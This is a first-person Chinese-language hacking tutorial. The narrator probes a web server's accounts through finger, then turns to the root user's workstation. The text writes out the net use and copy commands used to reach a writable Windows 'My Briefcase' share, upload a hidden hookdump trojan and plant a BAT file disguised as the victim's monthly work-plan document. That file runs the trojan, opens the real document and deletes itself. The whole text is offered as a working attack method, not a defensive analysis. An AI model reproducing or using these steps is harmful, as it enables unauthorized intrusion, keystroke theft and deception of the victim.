Once upon a time,我發現了一個網站,於是常規入侵。很好,它的FINGER開著,於是我編了一個SHELL,aaa帳號試到zzz(by the way,這是我發現的一個網上規律,那就是帳號的長度與口令的強度成正比, 如果一個帳號只有兩三位長,那它的口令一般也很簡單,反之亦然,故且稱之為若氏定理吧),結果一個帳號也不存在,我沒有再試它的帳號。因為我被它開的端口吸引住了,它開著WWW,我就不信它不出錯。一連拿了五種CGI和WWW掃描器總計掃了三四百種常見錯誤它幾乎都不存在。:( 有幾個錯誤,但我不知道如何利用,算了。又繞著主機轉了幾圈,象狐狸遇見刺猬,無從下嘴。
還是看看root的信息吧:
finger [email protected] Login name: root In real life: system PRIVILEGED account Directory: / Shell: /bin/sh Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx No Plan.root經常來,那個202.xx.xx.xx就是他用的工作站了,從那會不會看到點東西呢?
net view 202.xx.xx.xx Shared resources at 202.xx.xx.xx Sharename Type Comment x x 我的公文包 The command was completed successfully.在上網的機器上開著WINDOWS的“文件和打印機共享”的服務,是很多人容易掉以輕心的,這個root沒有例外。如果它的C盤共享了而且可寫那就好了,但那是做夢,現在開了共享的目錄沒有一個是根目錄,連D驅的都沒有。別著急,慢慢來。x掉的那些文件夾都沒用,不能寫,裡面盡是些英文原著,這個root還挺行的。“我的公文包”吸引了我的注意,這是一個用於將不同的機器上的資料進行同步的工具,很顯然這個root要經常更新主機上的主頁,有時候在自己的機器上編,有時候在主機上編……所以很重要的一點:“我的公文包”的共享一般都是可寫的!
>net use i: 202.xx.xx.xx >i: >echo asdf>temp.txt不錯,確實可寫。
>del temp.txt不留痕跡――黑客的習慣。
>dir/od/p看看都有些什麼…… 倒數第二排那個是什麼?“X月工作計劃.doc”!就是它了,既然是計劃就不可能寫完了就丟一邊,它肯定會再次打開它的――至少下個月寫計劃時要COPY一下:->
>copy hookdump.* i:補充一點:上傳前先編好它的hookdump.ini文件,置為隱藏方式運行,不然root一運行屏幕上蹦出一大窗口就……。
>edit c:X月工作計劃.BAT @echo off hookdump attrib -h X月工作計劃.doc C:Program FilesMicrosoftOfficeWinword X月工作計劃.doc attrib -h temp.bat del temp.pif del temp.bat看明白了吧?root運行了這個BAT文件實際上就是先運行木馬,再調用WINWORD文件打開它想開的這個文件,然後自我刪除,也許它機器上WINWORD的位置不同,那調用就會失敗,不過不要緊,反正BAT會馬上刪除,他會以為是自己的誤操作。
>copy X月工作計劃.bat i: >copy X月工作計劃.pif i: 然後把它的文件和自己的文件都藏起來: >attrib +h X月工作計劃.doc >attrib +h X月工作計劃.bat這樣,root的“公文包”裡只剩下一個和原來一模一樣的WORD圖標,他做夢也沒想到這已變成了一個BAT文件。然後可以喘口氣了,讓我們靜靜的等……